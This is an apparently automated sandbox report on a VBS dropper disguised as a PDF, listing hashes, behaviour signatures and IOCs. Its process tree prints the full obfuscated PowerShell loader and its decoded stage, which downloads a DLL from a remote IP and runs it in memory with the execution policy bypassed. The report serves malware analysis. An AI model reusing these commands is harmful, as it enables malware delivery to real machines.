Analysis

  • max time kernel
    94s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-12-2024 03:13

General

  • Target

    RFAU02GSHKOPSFDQW_002_PDF.vbs

  • Size

    222KB

  • MD5

    f212536d8cdf98f7284837ee48886346

  • SHA1

    7fe473d02fe0dc783b6021c792abca338dc4e11f

  • SHA256

    91f8e59475196b2ab33f9e5e22beb04d3ee039985abe1572a4a6e7b3f6f8b74d

  • SHA512

    08524a86d5b9f53953e9587286e7210c48ee403e99c67f13dbdd5081a7d558c58541c4e95b6ca640a98a5e5d8a634127801767655b168fa8889357d3319880c6

  • SSDEEP

    192:Oply3gSajcsbpS1zQ1QXDebjDqNBft1hx8+W6h8VDvwAv1CjIc:ODokghw1HqR98dfH1Cjj

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.106.255.48/dll/TESTING.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFAU02GSHKOPSFDQW_002_PDF.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤BE❤Ew❤T❤❤g❤D0❤I❤Bb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QwBv❤G4❤dgBl❤HI❤d❤Bd❤Do❤OgBG❤HI❤bwBt❤EI❤YQBz❤GU❤Ng❤0❤FM❤d❤By❤Gk❤bgBn❤Cg❤K❤BO❤GU❤dw❤t❤E8❤YgBq❤GU❤YwB0❤C❤❤TgBl❤HQ❤LgBX❤GU❤YgBD❤Gw❤aQBl❤G4❤d❤❤p❤C4❤R❤Bv❤Hc❤bgBs❤G8❤YQBk❤FM❤d❤By❤Gk❤bgBn❤Cg❤JwBo❤HQ❤d❤Bw❤Do❤Lw❤v❤DI❤M❤❤u❤DE❤M❤❤2❤C4❤Mg❤1❤DU❤Lg❤0❤Dg❤LwBk❤Gw❤b❤❤v❤FQ❤RQBT❤FQ❤SQBO❤Ec❤LgB0❤Hg❤d❤❤n❤Ck❤KQ❤7❤Fs❤UwB5❤HM❤d❤Bl❤G0❤LgBB❤H❤❤c❤BE❤G8❤bQBh❤Gk❤bgBd❤Do❤OgBD❤HU❤cgBy❤GU❤bgB0❤EQ❤bwBt❤GE❤aQBu❤C4❤T❤Bv❤GE❤Z❤❤o❤CQ❤R❤BM❤Ew❤KQ❤u❤Ec❤ZQB0❤FQ❤eQBw❤GU❤K❤❤n❤EY❤aQBi❤GU❤cg❤u❤Eg❤bwBt❤GU❤Jw❤p❤C4❤RwBl❤HQ❤TQBl❤HQ❤a❤Bv❤GQ❤K❤❤n❤FY❤QQBJ❤Cc❤KQ❤u❤Ek❤bgB2❤G8❤awBl❤Cg❤J❤Bu❤HU❤b❤Bs❤Cw❤I❤Bb❤G8❤YgBq❤GU❤YwB0❤Fs❤XQBd❤C❤❤K❤❤n❤DU❤Mg❤1❤Dk❤M❤Bl❤GI❤Yg❤w❤DI❤NQ❤0❤C0❤O❤❤z❤Dc❤OQ❤t❤DQ❤Yg❤1❤DQ❤LQBi❤Dc❤ZgBl❤C0❤Mw❤x❤GI❤YwBh❤GY❤N❤❤2❤D0❤bgBl❤Gs❤bwB0❤CY❤YQBp❤GQ❤ZQBt❤D0❤d❤Bs❤GE❤PwB0❤Hg❤d❤❤u❤D❤❤MgBB❤FI❤RQ❤v❤G8❤LwBt❤G8❤Yw❤u❤HQ❤bwBw❤HM❤c❤Bw❤GE❤Lg❤w❤Dc❤N❤Bm❤GY❤LQBz❤HI❤LwBi❤C8❤M❤B2❤C8❤bQBv❤GM❤LgBz❤Gk❤c❤Bh❤GU❤b❤Bn❤G8❤bwBn❤C4❤ZQBn❤GE❤cgBv❤HQ❤cwBl❤HM❤YQBi❤GU❤cgBp❤GY❤Lw❤v❤Do❤cwBw❤HQ❤d❤Bo❤Cc❤KQ❤p❤❤==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%testinmg%','');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3120
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.255.48/dll/TESTING.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('52590ebb0254-8379-4b54-b7fe-31bcaf46=nekot&aidem=tla?txt.02ARE/o/moc.topsppa.074ff-sr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4252

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    d8b9a260789a22d72263ef3bb119108c

    SHA1

    376a9bd48726f422679f2cd65003442c0b6f6dd5

    SHA256

    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

    SHA512

    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0c5f5wqv.teo.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3120-0-0x00007FFA102C3000-0x00007FFA102C5000-memory.dmp

    Filesize

    8KB

  • memory/3120-10-0x000001DB2C090000-0x000001DB2C0B2000-memory.dmp

    Filesize

    136KB

  • memory/3120-11-0x00007FFA102C0000-0x00007FFA10D81000-memory.dmp

    Filesize

    10.8MB

  • memory/3120-12-0x00007FFA102C0000-0x00007FFA10D81000-memory.dmp

    Filesize

    10.8MB

  • memory/3120-22-0x00007FFA102C3000-0x00007FFA102C5000-memory.dmp

    Filesize

    8KB

  • memory/3120-23-0x00007FFA102C0000-0x00007FFA10D81000-memory.dmp

    Filesize

    10.8MB

  • memory/3120-29-0x00007FFA102C0000-0x00007FFA10D81000-memory.dmp

    Filesize

    10.8MB